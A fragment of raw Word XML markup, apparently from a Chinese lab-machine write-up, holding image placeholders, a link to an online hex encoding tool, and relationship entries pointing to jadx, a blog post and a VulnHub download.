    <w:p w14:paraId="37BEAF3A" w14:textId="6215BD83" w:rsidR="00030BAC" w:rsidRPr="00030BAC" w:rsidRDefault="00030BAC" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId59" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>HEX编码/解码 - 在线工具 (try8.cn)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="36EF11D6" w14:textId="294A16FE" w:rsidR="00030BAC" w:rsidRDefault="00030BAC" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00030BAC">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A60E977" wp14:editId="68449E03">
            <wp:extent cx="5274310" cy="1322705"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="601935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58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A5BA" w14:textId="0CD5499C" w:rsidR="00030BAC" w:rsidRDefault="00030BAC" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00030BAC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D75A86E" wp14:editId="3A6D13EE">
            <wp:extent cx="5274310" cy="772795"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="246179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793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5EDB" w14:textId="29F2AD92" w:rsidR="00030BAC" w:rsidRDefault="00030BAC" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搞定</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BFE90E" w14:textId="00F6D5EE" w:rsidR="00030BAC" w:rsidRDefault="00DE73D2" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DE73D2">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1879C156" wp14:editId="11FACABA">
            <wp:extent cx="3619814" cy="708721"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1030320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074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B8EC" w14:textId="77777777" w:rsidR="00DE73D2" w:rsidRPr="00030BAC" w:rsidRDefault="00DE73D2" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00DE73D2" w:rsidRPr="00030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84A"/>
    <w:rsid w:val="00030BAC"/>
    <w:rsid w:val="000F584A"/>
    <w:rsid w:val="0015704A"/>
    <w:rsid w:val="00176F61"/>
    <w:rsid w:val="0033095B"/>
    <w:rsid w:val="00393C7B"/>
    <w:rsid w:val="004C56B7"/>
    <w:rsid w:val="005F26BF"/>
    <w:rsid w:val="006F0977"/>
    <w:rsid w:val="00743040"/>
    <w:rsid w:val="008C014E"/>
    <w:rsid w:val="008C6E0B"/>
    <w:rsid w:val="009334A2"/>
    <w:rsid w:val="0099170A"/>
    <w:rsid w:val="009C5844"/>
    <w:rsid w:val="00AB34F2"/>
    <w:rsid w:val="00B8456F"/>
    <w:rsid w:val="00C13E04"/>
    <w:rsid w:val="00DE73D2"/>
    <w:rsid w:val="00F22EF8"/>
    <w:rsid w:val="00FE5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AFF67"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{955F28D8-BB3F-4B17-82FF-FCB214A54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2EF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2EF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309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cnblogs.com/bmjoker/p/13508538.html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skylot/jadx/releases/tag/v1.4.7" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://try8.cn/tool/code/hex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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://download.vulnhub.com/orasi/Orasi.ov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18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3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-12-03T08:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-04T07:51:00Z</dcterms:modified>
</cp:coreProperties>
</file>